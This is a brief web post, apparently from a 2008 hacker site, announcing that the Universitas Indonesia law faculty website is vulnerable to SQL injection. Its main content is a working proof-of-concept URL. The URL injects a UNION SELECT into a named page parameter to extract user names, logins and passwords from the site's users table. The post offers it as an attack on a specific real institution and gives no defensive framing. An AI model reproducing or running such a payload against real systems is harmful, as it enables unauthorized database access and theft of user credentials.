SQL Injection Pada Website Fakultas Hukum Universitas Indonesia


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Wednesday, December 17th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: law.ui.ac.id.jpg Vulnerable to SQL Injection}

law.ui.ac.id.jpg Vulnerable to SQL Injection

POC

http://law.ui.ac.id/agenda/detail.php?AID=-198 union select 1,2,user(),4,group_concat(user_name,0x2d2d,user_login,0x2d2d,user_password),6 from users


//E.O.F